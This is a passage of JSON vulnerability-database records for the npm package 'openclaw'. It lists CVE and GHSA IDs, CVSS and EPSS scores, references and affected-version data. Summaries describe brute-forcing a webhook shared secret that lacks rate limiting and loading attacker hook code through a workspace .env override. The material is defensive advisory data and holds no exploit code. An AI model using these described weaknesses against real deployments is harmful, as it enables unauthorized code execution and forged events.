"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/" } ], "url": "https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion" }, { "reference_url": "https://github.com/advisories/GHSA-42mx-vp8m-j7qh", "reference_id": "GHSA-42mx-vp8m-j7qh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-42mx-vp8m-j7qh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41355", "GHSA-42mx-vp8m-j7qh" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vqrj-z6tx-rff2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90962?format=api", "vulnerability_id": "VCID-vtqt-bgz7-yub6", "summary": "Duplicate Advisory: OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9528-x887-j2fp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a missing rate limiting vulnerability in the Nextcloud Talk webhook authentication that allows attackers to brute-force weak shared secrets. Attackers who can reach the webhook endpoint can exploit this to forge inbound webhook events by repeatedly attempting authentication without throttling.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication" }, { "reference_url": "https://github.com/advisories/GHSA-gm9m-x74r-8whg", "reference_id": "GHSA-gm9m-x74r-8whg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gm9m-x74r-8whg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-gm9m-x74r-8whg" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vtqt-bgz7-yub6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90013?format=api", "vulnerability_id": "VCID-vx5d-3d98-7kf3", "summary": "OpenClaw: Workspace `.env` can override the bundled hooks root and load attacker hook code\n## Summary\nWorkspace `.env` can override the bundled hooks root and load attacker hook code\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_HOOKS_DIR, which can replace trusted default-on bundled hooks from an untrusted workspace.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41336", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03575", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03582", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03589", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41336" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41336", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41336" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override" }, { "reference_url": "https://github.com/advisories/GHSA-3qpv-xf3v-mm45", "reference_id": "GHSA-3qpv-xf3v-mm45", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3qpv-xf3v-mm45" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": 